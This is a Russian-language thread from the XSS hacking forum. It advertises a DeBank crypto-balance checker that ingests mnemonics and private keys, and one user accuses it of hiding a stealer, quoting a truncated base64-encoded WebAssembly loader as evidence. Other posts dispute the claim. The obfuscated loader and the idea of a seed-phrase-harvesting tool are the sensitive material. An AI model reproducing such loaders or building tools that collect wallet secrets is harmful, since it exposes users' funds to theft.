• XSS.stack #1 – первый литературный журнал от юзеров форума

чекер Debank Checker

nazavod

floppy-диск
Пользователь
Реакции
2

📌 Information:
• Парсинг Общего баланса (+ Pool Balance / + Token Balance)
• Многопоточность
• Поддержка Proxy (http / https / socks4/ socks5)
• Сортировка результатов по балансу (0, 0-1, 100-500, 500-1000, 1000+ $)
• Загрузка аккаунтов в любом удобном формате (скрипт алгоритмами ищет mnemonic, private key, address в каждой строке)
• Авто-замена Proxy при ошибке

DL | VT

❤️ Donate (any EVM chain) - 0xDEADf12DE9A24b47Da0a43E1bA70B8972F5296F2
❤️ Donate (SOL) - 2Fw2wh1pN77ELg6sWnn5cZrTDCK5ibfnKymTuCXL8sPX
❤️ Donate (TRX) -
TEAmkvFXJ6N6wzN4aS3HtgiM7XhnwRrtkW

на каких дураков это рассчитано? Смотрю кто как работает с дебанком, хочу написать свой чекер, и вот оно - золото под ногами.

Еще и решил отмазаться, что "часть кода спизжена", и наверное как раз вот здесь, дай угадаю

Смотрим, как кидала подклеивает интересный модуль (нет времени копаться), привожу фрагмент

Код:
var g, i = (g = "AGFzbQEAAAABYA9gA39/fwF/YAABf2ABfwF/YAR/f39/AX9gBH9+f38Bf2ABfwBgAn9/AX9gBn9/f39/fwF/YAR/f39/AGADf39/AGACf38AYAAAYAN/fn8BfmAFf39/f38Bf2ACfH8BfAJ6BQNlbnYCaVIAAQNlbnYEaE5IRAABFndhc2lfc25hcHNob3RfcHJldmlldzEIZmRfY2xvc2UAAhZ3YXNpX3NuYXBzaG90X3ByZXZpZXcxCGZkX3dyaXRlAAMWd2FzaV9zbmFwc2hvdF9wcmV2aWV3MQdmZF9zZWVrAAQDOTgFBQYGAwAABwcICAUJCgoCAgUFCwIDAAAAAAIAAwICAgAADAwGAA0JCwMAAAYABgIGAAYGAAYBDgQFAXABBQUFAwEAAQYPAn8BQZCLAQt

.....

AAAAAAAAAAAAAwMTIzNDU2Nzg5QUJDREVGLTBYKzBYIDBYLTB4KzB4IDB4AGluZgBJTkYAbmFuAE5BTgAuAABB+B0LcAUAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAMAAACEEQAAAAAAAAAAAAAAAAAAAgAAAAAAAAD/////AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=",
        "undefined" !== typeof globalThis.Buffer ? globalThis.Buffer.from(g, "base64") : Uint8Array.from(atob(g), (function(A) {
            return A.charCodeAt(0)
        }
        )));
var n = new WebAssembly.Instance(new WebAssembly.Module(i),Q);
            U = n.exports

Как раз для дебанка нужна мнемоника, а уж кодирование base64 - ну просто обязательно.

п.с. я понимаю почему тс ищет мамонтов в дзене, но не понимаю, почему он их ищет здесь.

на каких дураков это рассчитано? Смотрю кто как работает с дебанком, хочу написать свой чекер, и вот оно - золото под ногами.

Еще и решил отмазаться, что "часть кода спизжена", и наверное как раз вот здесь, дай угадаю

Смотрим, как кидала подклеивает интересный модуль (нет времени копаться), привожу фрагмент

Код:
var g, i = (g = "AGFzbQEAAAABYA9gA39/fwF/YAABf2ABfwF/YAR/f39/AX9gBH9+f38Bf2ABfwBgAn9/AX9gBn9/f39/fwF/YAR/f39/AGADf39/AGACf38AYAAAYAN/fn8BfmAFf39/f38Bf2ACfH8BfAJ6BQNlbnYCaVIAAQNlbnYEaE5IRAABFndhc2lfc25hcHNob3RfcHJldmlldzEIZmRfY2xvc2UAAhZ3YXNpX3NuYXBzaG90X3ByZXZpZXcxCGZkX3dyaXRlAAMWd2FzaV9zbmFwc2hvdF9wcmV2aWV3MQdmZF9zZWVrAAQDOTgFBQYGAwAABwcICAUJCgoCAgUFCwIDAAAAAAIAAwICAgAADAwGAA0JCwMAAAYABgIGAAYGAAYBDgQFAXABBQUFAwEAAQYPAn8BQZCLAQt

.....

AAAAAAAAAAAAAwMTIzNDU2Nzg5QUJDREVGLTBYKzBYIDBYLTB4KzB4IDB4AGluZgBJTkYAbmFuAE5BTgAuAABB+B0LcAUAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAMAAACEEQAAAAAAAAAAAAAAAAAAAgAAAAAAAAD/////AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=",
        "undefined" !== typeof globalThis.Buffer ? globalThis.Buffer.from(g, "base64") : Uint8Array.from(atob(g), (function(A) {
            return A.charCodeAt(0)
        }
        )));
            U = n.exports

Как раз для дебанка нужна мнемоника, а уж кодирование base64 - ну просто обязательно.

п.с. я понимаю почему тс ищет мамонтов в дзене, но не понимаю, почему он их ищет здесь.
Ну сделай wasm генерацию на чистом питоне без js'a, я аргументов грязи так и не увидел

Последнее редактирование:
Пожалуйста, обратите внимание, что пользователь заблокирован

Код:

.....

return A.charCodeAt(0)
        }
        )));
            U = n.exports

Так это wasm? в самом же дебанке тоже используется wasm для подписи хеша

Так это wasm? в самом же дебанке тоже используется wasm для подписи хеша
да, он. Теперь понятно, почему при декодировании столько мусора (то бишь нечитабельных символов).
спасибо большое за ссылку на статью о реверсинге - ужс.
Стоит девам с дебанка поправить рендомную функцию, от даты, на что-то похитрее, и все что написано в статье рассыпется. увы.
Проще брать данные с паблик нод, даже с 40=)

Однако. Если бы я своими глазами не видела, как в исходниках подсовывают свой адрес для слива данных, простенькое кодирование - я бы так не возмущалась.
(трговые боты)
Плюс то, что ТС раскидал рекламу на этот код повсюду в рунете, и это зная жлобство земляков(!). Значит, рассчитывает на большую прибыль;) чем донаты.

Ок, я остаюсь при своем мнении, а тс - при своем. 0:0

да, он. Теперь понятно, почему при декодировании столько мусора (то бишь нечитабельных символов).
спасибо большое за ссылку на статью о реверсинге - ужс.
Стоит девам с дебанка поправить рендомную функцию, от даты, на что-то похитрее, и все что написано в статье рассыпется. увы.
Проще брать данные с паблик нод, даже с 40=)

Однако. Если бы я своими глазами не видела, как в исходниках подсовывают свой адрес для слива данных, простенькое кодирование - я бы так не возмущалась.
(трговые боты)
Плюс то, что ТС раскидал рекламу на этот код повсюду в рунете, и это зная жлобство земляков(!). Значит, рассчитывает на большую прибыль;) чем донаты.

Ок, я остаюсь при своем мнении, а тс - при своем. 0:0
"что ТС раскидал рекламу на этот код повсюду в рунете" это где? Мой тг канал и 2 форума - весь интернет?
Что ты чепуху мелишь, ознакомься с тематикой того, что я делаю, и поймешь причины моих действий
Если у тебя ума не больше чем у камня - не стоит выписывать свой бред о мальваре, когда у тебя нет прямых доказательств, обычная клевета, ты просто пытаешься очернить мою репутацию, удали свои сообщения позорище
Ты меня не знаешь и не следишь за тем, чем я занимаюсь, при этом уже делаешь выводы - глупо
К тому же ума тебе не хватило посмотреть что софт поддерживает и загрузку просто адресов, без мнемоник и приватников, гений

софт поддерживает и загрузку просто адресов, без мнемоник и приватников, гений
Подтверждаю, софт рабочий и для чека небольшого кол-ва адрессов без прокси хватает. Но если маштабно чекать, то начинает вылазить лимит запросов. Только я использовал более старую версию, где результаты заносились в таблицу.

Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх